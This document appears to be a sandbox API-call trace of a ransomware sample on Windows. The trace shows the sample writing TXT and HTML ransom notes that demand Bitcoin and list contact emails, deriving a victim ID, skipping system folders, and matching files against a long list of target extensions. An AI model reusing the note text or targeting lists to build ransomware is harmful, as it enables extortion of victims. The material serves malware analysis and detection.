	[0180.685] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\my videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.685] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.685] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.696] CloseHandle (hObject=0x384) returned 1
	[0180.696] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.697] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0180.698] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.698] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\my videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.698] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.699] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.699] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0180.699] CloseHandle (hObject=0x384) returned 1
	[0180.699] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.699] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.700] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.700] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 64
	[0180.700] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\my videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.700] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.700] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0180.703] CloseHandle (hObject=0x384) returned 1
	[0180.703] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.703] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.704] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.705] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0180.706] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.706] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\my videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.706] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.706] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.706] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0180.707] CloseHandle (hObject=0x384) returned 1
	[0180.707] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*" (normalized: "c:\\users\\public\\documents\\my videos\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0180.707] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.707] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0
	[0180.707] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.707] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.708] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0180.708] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1
	[0180.708] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1
	[0180.708] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.708] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.708] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads"
	[0180.708] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads"
	[0180.708] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\"
	[0180.708] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\Downloads\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\"
	[0180.709] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Downloads\\*.*") returned="C:\\Users\\Public\\Downloads\\*.*"
	[0180.709] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*.*" (normalized: "c:\\users\\public\\downloads\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.709] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\*.*") returned 29
	[0180.709] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.709] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Downloads\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\public\\downloads\\*.*") returned 0x1d
	[0180.709] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.710] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="windows") returned 0x0
	[0180.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.710] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="boot") returned 0x0
	[0180.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.710] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="system volume information") returned 0x0
	[0180.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.710] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.711] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="temp") returned 0x0
	[0180.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.711] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="program files") returned 0x0
	[0180.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.711] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.711] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="appdata") returned 0x0
	[0180.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.712] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="application data") returned 0x0
	[0180.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.712] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="winnt") returned 0x0
	[0180.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.712] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="tmp") returned 0x0
	[0180.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.712] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="cache") returned 0x0
	[0180.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.713] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.713] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="webcache") returned 0x0
	[0180.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.713] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="inetcache") returned 0x0
	[0180.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.713] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="nvidia") returned 0x0
	[0180.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.714] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="packages") returned 0x0
	[0180.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.714] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="cookies") returned 0x0
	[0180.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.714] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="programdata") returned 0x0
	[0180.714] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.714] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.714] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.715] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.715] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Downloads\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\"
	[0180.715] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Downloads\\desktop.ini") returned="C:\\Users\\Public\\Downloads\\desktop.ini"
	[0180.715] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37
	[0180.715] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.715] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Downloads\\desktop.ini", cchLength=0x25 | out: lpsz="c:\\users\\public\\downloads\\desktop.ini") returned 0x25
	[0180.715] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.715] StrStrW (lpFirst="c:\\users\\public\\downloads\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.715] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\downloads\\desktop.ini" | out: lpString1="c:\\users\\public\\downloads\\desktop.ini") returned="c:\\users\\public\\downloads\\desktop.ini"
	[0180.716] lstrlenW (lpString="c:\\users\\public\\downloads\\desktop.ini") returned 37
	[0180.716] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.716] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.716] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.716] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.716] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
